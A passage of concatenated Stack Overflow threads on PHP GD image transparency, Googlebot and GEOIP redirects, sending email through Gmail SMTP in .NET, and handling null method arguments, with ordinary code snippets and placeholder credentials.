$information=getimagesize($myfile["tmp_name"]); $mywidth=$information[0]; $myheight=$information[1]; $newwidth=$mywidth; $newheight=$myheight; while(($newwidth > 600) || ($newheight > 400 )) { $newwidth = $newwidth-ceil($newwidth/100); $newheight = $newheight-ceil($newheight/100); } $files=$myfile["name"]; if($myfile["type"] == "image/gif") { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefromgif($myfile["tmp_name"]); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagegif($tmp, $files); imagedestroy($tmp); imagedestroy($src); if($con){ return true; } else { return false; } } else if(($myfile["type"] == "image/jpg") || ($myfile["type"] == "image/jpeg") ) { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefromjpeg($myfile["tmp_name"]); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagejpeg($tmp, $files); imagedestroy($tmp); imagedestroy($src); if($con) { return true; } else { return false; } } else if($myfile["type"] == "image/png") { $tmp=imagecreatetruecolor($newwidth,$newheight); $src=imagecreatefrompng($myfile["tmp_name"]); imagealphablending($tmp, false); imagesavealpha($tmp,true); $transparent = imagecolorallocatealpha($tmp, 255, 255, 255, 127); imagefilledrectangle($tmp, 0, 0, $newwidth, $newheight, $transparent); imagecopyresampled($tmp, $src, 0, 0, 0, 0, $newwidth, $newheight, $mywidth, $myheight); $con=imagepng($tmp, $files); imagedestroy($tmp); imagedestroy($src); if($con) { return true; } else { return false; } } } else return false; } A: I suppose that this might do the trick: $uploadTempFile = $myField[ 'tmp_name' ] list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile ); $srcImage = imagecreatefrompng( $uploadTempFile ); $targetImage = imagecreatetruecolor( 128, 128 ); $transparent = imagecolorallocate($targetImage,0,255,0); imagecolortransparent($targetImage,$transparent); imagefilledrectangle($targetImage,0,0,127,127,$transparent); imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight ); imagepng( $targetImage, 'out.png', 9 ); The downside is that the image will be stripped of every 100% green pixels. Anyhow, hope it helps :) A: Why do you make things so complicated? the following is what I use and so far it has done the job for me. $im = ImageCreateFromPNG($source); $new_im = imagecreatetruecolor($new_size[0],$new_size[1]); imagecolortransparent($new_im, imagecolorallocate($new_im, 0, 0, 0)); imagecopyresampled($new_im,$im,0,0,0,0,$new_size[0],$new_size[1],$size[0],$size[1]); A: imagealphablending( $targetImage, false ); imagesavealpha( $targetImage, true ); did it for me. Thanks ceejayoz. note, the target image needs the alpha settings, not the source image. Edit: full replacement code. See also answers below and their comments. This is not guaranteed to be be perfect in any way, but did achieve my needs at the time. $uploadTempFile = $myField[ 'tmp_name' ] list( $uploadWidth, $uploadHeight, $uploadType ) = getimagesize( $uploadTempFile ); $srcImage = imagecreatefrompng( $uploadTempFile ); $targetImage = imagecreatetruecolor( 128, 128 ); imagealphablending( $targetImage, false ); imagesavealpha( $targetImage, true ); imagecopyresampled( $targetImage, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight ); imagepng( $targetImage, 'out.png', 9 ); A: Regrading the preserve transparency, then yes like stated in other posts imagesavealpha() have to be set to true, to use the alpha flag imagealphablending() must be set to false else it doesn't work. Also I spotted two minor things in your code: * *You don't need to call getimagesize() to get the width/height for imagecopyresmapled() *The $uploadWidth and $uploadHeight should be -1 the value, since the cordinates starts at 0 and not 1, so it would copy them into an empty pixel. Replacing it with: imagesx($targetImage) - 1 and imagesy($targetImage) - 1, relativily should do :) A: I believe this should do the trick: $srcImage = imagecreatefrompng($uploadTempFile); imagealphablending($srcImage, false); imagesavealpha($srcImage, true); edit: Someone in the PHP docs claims imagealphablending should be true, not false. YMMV. A: Here is my total test code. It works for me $imageFileType = pathinfo($_FILES["image"]["name"], PATHINFO_EXTENSION); $filename = 'test.' . $imageFileType; move_uploaded_file($_FILES["image"]["tmp_name"], $filename); $source_image = imagecreatefromjpeg($filename); $source_imagex = imagesx($source_image); $source_imagey = imagesy($source_image); $dest_imagex = 400; $dest_imagey = 600; $dest_image = imagecreatetruecolor($dest_imagex, $dest_imagey); imagecopyresampled($dest_image, $source_image, 0, 0, 0, 0, $dest_imagex, $dest_imagey, $source_imagex, $source_imagey); imagesavealpha($dest_image, true); $trans_colour = imagecolorallocatealpha($dest_image, 0, 0, 0, 127); imagefill($dest_image, 0, 0, $trans_colour); imagepng($dest_image,"test1.png",1); A: Pay attention to the source image's width and height values which are passed to imagecopyresampled function. If they are bigger than actual source image size, the rest of image area will be filled with black color. A: I combined the answers from ceejayoz and Cheekysoft, which gave the best result for me. Without imagealphablending() and imagesavealpha() the image is not clear: $img3 = imagecreatetruecolor(128, 128); imagecolortransparent($img3, imagecolorallocate($img3, 0, 0, 0)); imagealphablending( $img3, false ); imagesavealpha( $img3, true ); imagecopyresampled($img3, $srcImage, 0, 0, 0, 0, 128, 128, $uploadWidth, $uploadHeight); imagepng($img3, 'filename.png', 9); A: For anyone having problems with imagecopyresampled or imagerotate with black bars on background, I have found a code example here: https://qna.habr.com/q/646622#answer_1417035 // get image sizes (X,Y) $wx = imagesx($imageW); $wy = imagesy($imageW); // create a new image from the sizes on transparent canvas $new = imagecreatetruecolor($wx, $wy); $transparent = imagecolorallocatealpha($new, 0, 0, 0, 127); $rotate = imagerotate($imageW, 280, $transparent); imagealphablending($rotate, true); imagesavealpha($rotate, true); // get the newest image X and Y $ix = imagesx($rotate); $iy = imagesy($rotate); //copy the image to the canvas imagecopyresampled($destImg, $rotate, 940, 2050, 0, 0, $ix, $iy, $ix, $iy);
{ "language": "en", "url": "https://stackoverflow.com/questions/32243", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "113" }
Q: how to get the googlebot to get the correct GEOIPed content? OK. This problem is doing my head in. And I don't know if there even IS a definitive answer. We have a website, lets call it mycompany.com. It's a UK-based site, with UK based content. Google knows about it, and we have done a load of SEO on it. All is well. Except, we are about to relaunch my company, the GLOBAL brand, so we now need mycompany.com/uk, mycompany.com/us, and mycompany.com/au, for the various countries local content. We are using GEOIP, so if someone from the US loads mycompany.com, they get redirected to mycompany.com/us etc. If someone isn't in one of those three countries (US, Australia, or UK) they get the UK site. This is all well and good, but we dont want to lose the rather large amount of Google juice we have on mycompany.com! And worse, the Google bot appears to be 100% based in the US, so the US site (which is pretty much out LEAST important one of the three) will appear to be the main one. We have thought about detecting the bot, and serving UK content, but it appears Google may smack us for that. Has anyone else come across this situation, and have a solution? A: As long as Google can find mycompany.com/uk and mycompany.com/au, it'll index all three versions of the site. Your domain's Google juice should apply to all three URLs just fine if they're on the same domain. A: Have you thought about including links for different sites on the homepage? Google could follow those and index their content as well - in turn indexing the UK content. A: If you instead using uk.mycompany.com, us. mycompany.com etc, then you can register them with google webmaster tools and specifically tell google which country they are from. This might still work with folders rather than subdomains, but I haven't tried it. One way to get round that, thinking about it, would be to 301 redirect uk.mycompany.com to mycompany.com/uk, then you'd be telling Google, as well as keeping your existing structure. A: @ross: yes, we have links between the sites. It' just the home page, and which one comes up when someone searches for "my company" in google. Thanks! A: google alerts just brought me to this thread. The domain name that was previously used in your question is my blog and the domain name is not for sale. Are you just using this as an example domain - for the purpose of this discussion only? The convention is to use example.com as it is reserved for this exact purpose. Some clarification would be appreciated.
{ "language": "en", "url": "https://stackoverflow.com/questions/32246", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "0" }
Q: Sending email in .NET through Gmail Instead of relying on my host to send an email, I was thinking of sending the email messages using my Gmail account. The emails are personalized emails to the bands I play on my show. Is it possible to do it? A: If you want to send background email, then please do the below public void SendEmail(string address, string subject, string message) { Thread threadSendMails; threadSendMails = new Thread(delegate() { //Place your Code here }); threadSendMails.IsBackground = true; threadSendMails.Start(); } and add namespace using System.Threading; A: Try This, private void button1_Click(object sender, EventArgs e) { try { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com"); mail.From = new MailAddress("[email protected]"); mail.To.Add("to_address"); mail.Subject = "Test Mail"; mail.Body = "This is for testing SMTP mail from GMAIL"; SmtpServer.Port = 587; SmtpServer.Credentials = new System.Net.NetworkCredential("username", "password"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); MessageBox.Show("mail Send"); } catch (Exception ex) { MessageBox.Show(ex.ToString()); } } A: use this way MailMessage sendmsg = new MailMessage(SendersAddress, ReceiversAddress, subject, body); SmtpClient client = new SmtpClient("smtp.gmail.com"); client.Port = Convert.ToInt32("587"); client.EnableSsl = true; client.Credentials = new System.Net.NetworkCredential("[email protected]","MyPassWord"); client.Send(sendmsg); Don't forget this : using System.Net; using System.Net.Mail; A: From 1 Jun 2022, ​​Google has added some security features Google is no longer support the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password or send mail directly using username and password of google account. But you still can send E-Mail via your gmail account using generating app password. Below are the steps for generate new password. * *Go to https://myaccount.google.com/security *Turn on two step verification. *Confirm your account by phone if needed. *Click "App Passwords", just below the "2 step verification" tick. Request a new password for the mail app. Now we have to use this password for sending mail instead of the original password of your account. Below is the example code for sending mail public static void SendMailFromApp(string SMTPServer, int SMTP_Port, string From, string Password, string To, string Subject, string Body) { var smtpClient = new SmtpClient(SMTPServer, SMTP_Port) { DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, EnableSsl = true }; smtpClient.Credentials = new NetworkCredential(From, Password); //Use the new password, generated from google! var message = new System.Net.Mail.MailMessage(new System.Net.Mail.MailAddress(From, "SendMail2Step"), new System.Net.Mail.MailAddress(To, To)); smtpClient.Send(message); } You can to call method like below SendMailFromApp("smtp.gmail.com", 25, "[email protected]", "tyugyyj1556jhghg",//This will be generated by google, copy it here. "[email protected]", "New Mail Subject", "Body of mail from My App"); A: Changing sender on Gmail / Outlook.com email: To prevent spoofing - Gmail/Outlook.com won't let you send from an arbitrary user account name. If you have a limited number of senders you can follow these instructions and then set the From field to this address: Sending mail from a different address If you are wanting to send from an arbitrary email address (such as a feedback form on website where the user enters their email and you don't want them emailing you directly) about the best you can do is this : msg.ReplyToList.Add(new System.Net.Mail.MailAddress(email, friendlyName)); This would let you just hit 'reply' in your email account to reply to the fan of your band on a feedback page, but they wouldn't get your actual email which would likely lead to a tonne of spam. If you're in a controlled environment this works great, but please note that I've seen some email clients send to the from address even when reply-to is specified (I don't know which). A: I had the same issue, but it was resolved by going to gmail's security settings and Allowing Less Secure apps. The Code from Domenic & Donny works, but only if you enabled that setting If you are signed in (to Google) you can follow this link and toggle "Turn on" for "Access for less secure apps" A: using System; using System.Net; using System.Net.Mail; namespace SendMailViaGmail { class Program { static void Main(string[] args) { //Specify senders gmail address string SendersAddress = "[email protected]"; //Specify The Address You want to sent Email To(can be any valid email address) string ReceiversAddress = "[email protected]"; //Specify The password of gmial account u are using to sent mail(pw of [email protected]) const string SendersPassword = "Password"; //Write the subject of ur mail const string subject = "Testing"; //Write the contents of your mail const string body = "Hi This Is my Mail From Gmail"; try { //we will use Smtp client which allows us to send email using SMTP Protocol //i have specified the properties of SmtpClient smtp within{} //gmails smtp server name is smtp.gmail.com and port number is 587 SmtpClient smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, Credentials = new NetworkCredential(SendersAddress, SendersPassword), Timeout = 3000 }; //MailMessage represents a mail message //it is 4 parameters(From,TO,subject,body) MailMessage message = new MailMessage(SendersAddress, ReceiversAddress, subject, body); /*WE use smtp sever we specified above to send the message(MailMessage message)*/ smtp.Send(message); Console.WriteLine("Message Sent Successfully"); Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.Message); Console.ReadKey(); } } } } A: This is to send email with attachement.. Simple and short.. source: http://coding-issues.blogspot.in/2012/11/sending-email-with-attachments-from-c.html using System.Net; using System.Net.Mail; public void email_send() { MailMessage mail = new MailMessage(); SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com"); mail.From = new MailAddress("your [email protected]"); mail.To.Add("[email protected]"); mail.Subject = "Test Mail - 1"; mail.Body = "mail with attachment"; System.Net.Mail.Attachment attachment; attachment = new System.Net.Mail.Attachment("c:/textfile.txt"); mail.Attachments.Add(attachment); SmtpServer.Port = 587; SmtpServer.Credentials = new System.Net.NetworkCredential("your [email protected]", "your password"); SmtpServer.EnableSsl = true; SmtpServer.Send(mail); } A: Google has removed the less secure apps setting from our Google accounts, this means that we can no longer send emails from the SMTP server using our actual google passwords. We need to either use Xoauth2 and authorize the user or create a an apps password on an account that has 2fa enabled. Once created an apps password can be used in place of your standard gmail password. class Program { private const string To = "[email protected]"; private const string From = "[email protected]"; private const string GoogleAppPassword = "XXXXXXXX"; private const string Subject = "Test email"; private const string Body = "<h1>Hello</h1>"; static void Main(string[] args) { Console.WriteLine("Hello World!"); var smtpClient = new SmtpClient("smtp.gmail.com") { Port = 587, Credentials = new NetworkCredential(From , GoogleAppPassword), EnableSsl = true, }; var mailMessage = new MailMessage { From = new MailAddress(From), Subject = Subject, Body = Body, IsBodyHtml = true, }; mailMessage.To.Add(To); smtpClient.Send(mailMessage); } } Quick fix for SMTP username and password not accepted error A: After google update, This is the valid method to send an email using c# or .net. using System; using System.Net; using System.Net.Mail; namespace EmailApp { internal class Program { public static void Main(string[] args) { String SendMailFrom = "Sender Email"; String SendMailTo = "Reciever Email"; String SendMailSubject = "Email Subject"; String SendMailBody = "Email Body"; try { SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com",587); SmtpServer.DeliveryMethod = SmtpDeliveryMethod.Network; MailMessage email = new MailMessage(); // START email.From = new MailAddress(SendMailFrom); email.To.Add(SendMailTo); email.CC.Add(SendMailFrom); email.Subject = SendMailSubject; email.Body = SendMailBody; //END SmtpServer.Timeout = 5000; SmtpServer.EnableSsl = true; SmtpServer.UseDefaultCredentials = false; SmtpServer.Credentials = new NetworkCredential(SendMailFrom, "Google App Password"); SmtpServer.Send(email); Console.WriteLine("Email Successfully Sent"); Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.ToString()); Console.ReadKey(); } } } } For creating the app password, you can follow this article: https://www.techaeblogs.live/2022/06/how-to-send-email-using-gmail.html A: Google may block sign in attempts from some apps or devices that do not use modern security standards. Since these apps and devices are easier to break into, blocking them helps keep your account safer. Some examples of apps that do not support the latest security standards include: * *The Mail app on your iPhone or iPad with iOS 6 or below *The Mail app on your Windows phone preceding the 8.1 release *Some Desktop mail clients like Microsoft Outlook and Mozilla Thunderbird Therefore, you have to enable Less Secure Sign-In in your google account. After sign into google account, go to: https://myaccount.google.com/lesssecureapps or https://www.google.com/settings/security/lesssecureapps In C#, you can use the following code: using (MailMessage mail = new MailMessage()) { mail.From = new MailAddress("[email protected]"); mail.To.Add("[email protected]"); mail.Subject = "Hello World"; mail.Body = "<h1>Hello</h1>"; mail.IsBodyHtml = true; mail.Attachments.Add(new Attachment("C:\\file.zip")); using (SmtpClient smtp = new SmtpClient("smtp.gmail.com", 587)) { smtp.Credentials = new NetworkCredential("[email protected]", "password"); smtp.EnableSsl = true; smtp.Send(mail); } } A: For me to get it to work, i had to enable my gmail account making it possible for other apps to gain access. This is done with the "enable less secure apps" and also using this link: https://accounts.google.com/b/0/DisplayUnlockCaptcha A: Here is one method to send mail and getting credentials from web.config: public static string SendEmail(string To, string Subject, string Msg, bool bodyHtml = false, bool test = false, Stream AttachmentStream = null, string AttachmentType = null, string AttachmentFileName = null) { try { System.Net.Mail.MailMessage newMsg = new System.Net.Mail.MailMessage(System.Configuration.ConfigurationManager.AppSettings["mailCfg"], To, Subject, Msg); newMsg.BodyEncoding = System.Text.Encoding.UTF8; newMsg.HeadersEncoding = System.Text.Encoding.UTF8; newMsg.SubjectEncoding = System.Text.Encoding.UTF8; System.Net.Mail.SmtpClient smtpClient = new System.Net.Mail.SmtpClient(); if (AttachmentStream != null && AttachmentType != null && AttachmentFileName != null) { System.Net.Mail.Attachment attachment = new System.Net.Mail.Attachment(AttachmentStream, AttachmentFileName); System.Net.Mime.ContentDisposition disposition = attachment.ContentDisposition; disposition.FileName = AttachmentFileName; disposition.DispositionType = System.Net.Mime.DispositionTypeNames.Attachment; newMsg.Attachments.Add(attachment); } if (test) { smtpClient.PickupDirectoryLocation = "C:\\TestEmail"; smtpClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.SpecifiedPickupDirectory; } else { //smtpClient.EnableSsl = true; } newMsg.IsBodyHtml = bodyHtml; smtpClient.Send(newMsg); return SENT_OK; } catch (Exception ex) { return "Error: " + ex.Message + "<br/><br/>Inner Exception: " + ex.InnerException; } } And the corresponding section in web.config: <appSettings> <add key="mailCfg" value="[email protected]"/> </appSettings> <system.net> <mailSettings> <smtp deliveryMethod="Network" from="[email protected]"> <network defaultCredentials="false" host="mail.exapmple.com" userName="[email protected]" password="your_password" port="25"/> </smtp> </mailSettings> </system.net> A: Try this one public static bool Send(string receiverEmail, string ReceiverName, string subject, string body) { MailMessage mailMessage = new MailMessage(); MailAddress mailAddress = new MailAddress("[email protected]", "Sender Name"); // [email protected] = input Sender Email Address mailMessage.From = mailAddress; mailAddress = new MailAddress(receiverEmail, ReceiverName); mailMessage.To.Add(mailAddress); mailMessage.Subject = subject; mailMessage.Body = body; mailMessage.IsBodyHtml = true; SmtpClient mailSender = new SmtpClient("smtp.gmail.com", 587) { EnableSsl = true, UseDefaultCredentials = false, DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network, Credentials = new NetworkCredential("[email protected]", "pass") // [email protected] = input sender email address //pass = sender email password }; try { mailSender.Send(mailMessage); return true; } catch (SmtpFailedRecipientException ex) { // Write the exception to a Log file. } catch (SmtpException ex) { // Write the exception to a Log file. } finally { mailSender = null; mailMessage.Dispose(); } return false; } A: You can try Mailkit. It gives you better and advance functionality for send mail. You can find more from this Here is an example MimeMessage message = new MimeMessage(); message.From.Add(new MailboxAddress("FromName", "[email protected]")); message.To.Add(new MailboxAddress("ToName", "[email protected]")); message.Subject = "MyEmailSubject"; message.Body = new TextPart("plain") { Text = @"MyEmailBodyOnlyTextPart" }; using (var client = new SmtpClient()) { client.Connect("SERVER", 25); // 25 is port you can change accordingly // Note: since we don't have an OAuth2 token, disable // the XOAUTH2 authentication mechanism. client.AuthenticationMechanisms.Remove("XOAUTH2"); // Note: only needed if the SMTP server requires authentication client.Authenticate("YOUR_USER_NAME", "YOUR_PASSWORD"); client.Send(message); client.Disconnect(true); } A: Here is my version: "Send Email In C # Using Gmail". using System; using System.Net; using System.Net.Mail; namespace SendMailViaGmail { class Program { static void Main(string[] args) { //Specify senders gmail address string SendersAddress = "[email protected]"; //Specify The Address You want to sent Email To(can be any valid email address) string ReceiversAddress = "[email protected]"; //Specify The password of gmial account u are using to sent mail(pw of [email protected]) const string SendersPassword = "Password"; //Write the subject of ur mail const string subject = "Testing"; //Write the contents of your mail const string body = "Hi This Is my Mail From Gmail"; try { //we will use Smtp client which allows us to send email using SMTP Protocol //i have specified the properties of SmtpClient smtp within{} //gmails smtp server name is smtp.gmail.com and port number is 587 SmtpClient smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, Credentials = new NetworkCredential(SendersAddress, SendersPassword), Timeout = 3000 }; //MailMessage represents a mail message //it is 4 parameters(From,TO,subject,body) MailMessage message = new MailMessage(SendersAddress, ReceiversAddress, subject, body); /*WE use smtp sever we specified above to send the message(MailMessage message)*/ smtp.Send(message); Console.WriteLine("Message Sent Successfully"); Console.ReadKey(); } catch (Exception ex) { Console.WriteLine(ex.Message); Console.ReadKey(); } } } } A: The above answer doesn't work. You have to set DeliveryMethod = SmtpDeliveryMethod.Network or it will come back with a "client was not authenticated" error. Also it's always a good idea to put a timeout. Revised code: using System.Net.Mail; using System.Net; var fromAddress = new MailAddress("[email protected]", "From Name"); var toAddress = new MailAddress("[email protected]", "To Name"); const string fromPassword = "password"; const string subject = "test"; const string body = "Hey now!!"; var smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, Credentials = new NetworkCredential(fromAddress.Address, fromPassword), Timeout = 20000 }; using (var message = new MailMessage(fromAddress, toAddress) { Subject = subject, Body = body }) { smtp.Send(message); } A: I hope this code will work fine. You can have a try. // Include this. using System.Net.Mail; string fromAddress = "[email protected]"; string mailPassword = "*****"; // Mail id password from where mail will be sent. string messageBody = "Write the body of the message here."; // Create smtp connection. SmtpClient client = new SmtpClient(); client.Port = 587;//outgoing port for the mail. client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Timeout = 10000; client.DeliveryMethod = SmtpDeliveryMethod.Network; client.UseDefaultCredentials = false; client.Credentials = new System.Net.NetworkCredential(fromAddress, mailPassword); // Fill the mail form. var send_mail = new MailMessage(); send_mail.IsBodyHtml = true; //address from where mail will be sent. send_mail.From = new MailAddress("[email protected]"); //address to which mail will be sent. send_mail.To.Add(new MailAddress("[email protected]"); //subject of the mail. send_mail.Subject = "put any subject here"; send_mail.Body = messageBody; client.Send(send_mail); A: Edit 2022 Starting May 30, 2022, ​​Google will no longer support the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password. But you still can send E-Mail via your gmail account. * *Go to https://myaccount.google.com/security and turn on two step verification. Confirm your account by phone if needed. *Click "App Passwords", just below the "2 step verification" tick. *Request a new password for the mail app. Now just use this password instead of the original one for you account! public static void SendMail2Step(string SMTPServer, int SMTP_Port, string From, string Password, string To, string Subject, string Body, string[] FileNames) { var smtpClient = new SmtpClient(SMTPServer, SMTP_Port) { DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, EnableSsl = true }; smtpClient.Credentials = new NetworkCredential(From, Password); //Use the new password, generated from google! var message = new System.Net.Mail.MailMessage(new System.Net.Mail.MailAddress(From, "SendMail2Step"), new System.Net.Mail.MailAddress(To, To)); smtpClient.Send(message); } Use like this: SendMail2Step("smtp.gmail.com", 587, "[email protected]", "yjkjcipfdfkytgqv",//This will be generated by google, copy it here. "[email protected]", "test message subject", "Test message body ...", null); For the other answers to work "from a server" first Turn On Access for less secure apps in the gmail account. This will be deprecated 30 May 2022 Looks like recently google changed it's security policy. The top rated answer no longer works, until you change your account settings as described here: https://support.google.com/accounts/answer/6010255?hl=en-GB As of March 2016, google changed the setting location again! A: Source : Send email in ASP.NET C# Below is a sample working code for sending in a mail using C#, in the below example I am using google’s smtp server. The code is pretty self explanatory, replace email and password with your email and password values. public void SendEmail(string address, string subject, string message) { string email = "[email protected]"; string password = "put-your-GMAIL-password-here"; var loginInfo = new NetworkCredential(email, password); var msg = new MailMessage(); var smtpClient = new SmtpClient("smtp.gmail.com", 587); msg.From = new MailAddress(email); msg.To.Add(new MailAddress(address)); msg.Subject = subject; msg.Body = message; msg.IsBodyHtml = true; smtpClient.EnableSsl = true; smtpClient.UseDefaultCredentials = false; smtpClient.Credentials = loginInfo; smtpClient.Send(msg); } A: To avoid security issues in Gmail, you should generate an app password first from your Gmail settings and you can use this password instead of a real password to send an email even if you use two steps verification. A: Be sure to use System.Net.Mail, not the deprecated System.Web.Mail. Doing SSL with System.Web.Mail is a gross mess of hacky extensions. using System.Net; using System.Net.Mail; var fromAddress = new MailAddress("[email protected]", "From Name"); var toAddress = new MailAddress("[email protected]", "To Name"); const string fromPassword = "fromPassword"; const string subject = "Subject"; const string body = "Body"; var smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, Credentials = new NetworkCredential(fromAddress.Address, fromPassword) }; using (var message = new MailMessage(fromAddress, toAddress) { Subject = subject, Body = body }) { smtp.Send(message); } Additionally go to the Google Account > Security page and look at the Signing in to Google > 2-Step Verification setting. * *If it is enabled, then you have to generate a password allowing .NET to bypass the 2-Step Verification. To do this, click on Signing in to Google > App passwords, select app = Mail, and device = Windows Computer, and finally generate the password. Use the generated password in the fromPassword constant instead of your standard Gmail password. *If it is disabled, then you have to turn on Less secure app access, which is not recommended! So better enable the 2-Step verification. A: Include this, using System.Net.Mail; And then, MailMessage sendmsg = new MailMessage(SendersAddress, ReceiversAddress, subject, body); SmtpClient client = new SmtpClient("smtp.gmail.com"); client.Port = 587; client.Credentials = new System.Net.NetworkCredential("[email protected]","password"); client.EnableSsl = true; client.Send(sendmsg); A: Copying from another answer, the above methods work but gmail always replaces the "from" and "reply to" email with the actual sending gmail account. apparently there is a work around however: http://karmic-development.blogspot.in/2013/10/send-email-from-aspnet-using-gmail-as.html "3. In the Accounts Tab, Click on the link "Add another email address you own" then verify it" Or possibly this Update 3: Reader Derek Bennett says, "The solution is to go into your gmail Settings:Accounts and "Make default" an account other than your gmail account. This will cause gmail to re-write the From field with whatever the default account's email address is." A: This is no longer supported incase you are trying to do this now. https://support.google.com/accounts/answer/6010255?hl=en&visit_id=637960864118404117-800836189&p=less-secure-apps&rd=1#zippy= A: If your Google password doesn't work, you may need to create an app-specific password for Gmail on Google. https://support.google.com/accounts/answer/185833?hl=en
{ "language": "en", "url": "https://stackoverflow.com/questions/32260", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "951" }
Q: Passing null to a method I am in the middle of reading the excellent Clean Code One discussion is regarding passing nulls into a method. public class MetricsCalculator { public double xProjection(Point p1, Point p2) { return (p2.x - p1.x) * 1.5; } } ... calculator.xProjection(null, new Point(12,13)); It represents different ways of handling this: public double xProjection(Point p1, Point p2) { if (p1 == null || p2 == null) { throw new IllegalArgumentException("Invalid argument for xProjection"); } return (p2.x - p1.x) * 1.5; } public double xProjection(Point p1, Point p2) { assert p1 != null : "p1 should not be null"; assert p2 != null : "p2 should not be null"; return (p2.x - p1.x) * 1.5; } I prefer the assertions approach, but I don't like the fact that assertions are turned off by default. The book finally states: In most programming languages there is no good way to deal with a null that is passed by a caller accidentally. Because this is the case, the rational approach is to forbid passing null by default. It doesn't really go into how you would enforce this restriction? Do any of you have strong opinions either way. A: General rule is if your method doesn't expect null arguments then you should throw System.ArgumentNullException. Throwing proper Exception not only protects you from resource corruption and other bad things but serves as a guide for users of your code saving time spent debugging your code. Also read an article on Defensive programming A: Also not of immediate use, but related to the mention of Spec#... There's a proposal to add "null-safe types" to a future version of Java: "Enhanced null handling - Null-safe types". Under the proposal, your method would become public class MetricsCalculator { public double xProjection(#Point p1, #Point p2) { return (p2.x - p1.x) * 1.5; } } where #Point is the type of non-null references to objects of type Point. A: Both the use of assertions and the throwing of exceptions are valid approaches here. Either mechanism can be used to indicate a programming error, not a runtime error, as is the case here. * *Assertions have the advantage of performance as they are typically disabled on production systems. *Exceptions have the advantage of safety, as the check is always performed. The choice really depends on the development practices of the project. The project as a whole needs to decide on an assertion policy: if the choice is to enable assertions during all development, then I'd say to use assertions to check this kind of invalid parameter - in a production system, a NullPointerException thrown due to a programming error is unlikely to be able to be caught and handled in a meaningful way anyway and so will act just like an assertion. Practically though, I know a lot of developers that don't trust that assertions will be enabled when appropriate and so opt for the safety of throwing a NullPointerException. Of course if you can't enforce a policy for your code (if you're creating a library, for example, and so are dependent on how other developers run your code), you should opt for the safe approach of throwing NullPointerException for those methods that are part of the library's API. A: It doesn't really go into how you would enforce this restriction? You enforce it by throwing an ArgumentExcexception if they pass in null. if (p1 == null || p2 == null) { throw new IllegalArgumentException("Invalid argument for xProjection"); } A: Spec# looks very interesting! When something like that isn't available, I generally test non-private methods with a run-time null-check, and assertions for internal methods. Rather than code the null check explicitly in each method, I delegate that to a utilities class with a check null method: /** * Checks to see if an object is null, and if so * generates an IllegalArgumentException with a fitting message. * * @param o The object to check against null. * @param name The name of the object, used to format the exception message * * @throws IllegalArgumentException if o is null. */ public static void checkNull(Object o, String name) throws IllegalArgumentException { if (null == o) throw new IllegalArgumentException(name + " must not be null"); } public static void checkNull(Object o) throws IllegalArgumentException { checkNull(o, "object"); } // untested: public static void checkNull(Object... os) throws IllegalArgumentException { for(Object o in os) checkNull(o); } Then checking turns into: public void someFun(String val1, String val2) throws IllegalArgumentException { ExceptionUtilities.checkNull(val1, "val1"); ExceptionUtilities.checkNull(val2, "val2"); /** alternatively: ExceptionUtilities.checkNull(val1, val2); **/ /** ... **/ } That can be added with editor macros, or a code-processing script. Edit: The verbose check could be added this way as well, but I think it's significantly easier to automate the addition of a single line. A: In most programming languages there is no good way to deal with a null that is passed by a caller accidentally. Because this is the case, the rational approach is to forbid passing null by default. I found JetBrains' @Nullable and @NotNull annotations approach for dealing with this the most ingenious, so far. It's IDE specific, unfortunately, but really clean and powerful, IMO. http://www.jetbrains.com/idea/documentation/howto.html Having this (or something similar) as a java standard would be really nice. A: I prefer the use of assertions. I have a rule that I only use assertions in public and protected methods. This is because I believe the calling method should ensure that it is passing valid arguments to private methods. A: I generally prefer not doing either, since it's just slowing things down. NullPointerExceptions are thrown later on anyway, which will quickly lead the user to discovering they're passing null to the method. I used to check, but 40% of my code ended up being checking code, at which point I decided it was just not worth the nice assertion messages. A: I agree or disagree with wvdschel's post, it depends on what he's specifically saying. In this case, sure, this method will crash on null so the explicit check here is probably not needed. However, if the method simply stores the passed data, and there is some other method that you call later that will deal with it, discovering bad input as early as possible is the key to fixing bugs faster. At that later point, there could be a myriad of ways that bad data happened to be given to your class. It's sort of trying to figure out how the rats came into your house after the fact, trying to find the hole somewhere. A: @Chris Karcher I would say absolutely correct. The only thing I would say is check the params separately and have the exeption report the param that was null also as it makes tracking where the null is coming from much easier. @wvdschel wow! If writing the code is too much effort for you, you should look into something like PostSharp (or a Java equivalent if one is available) which can post-process your assemblies and insert param checks for you. A: Although it is not strictly related you might want to take a look to Spec#. I think it is still in development (by Microsoft) but some 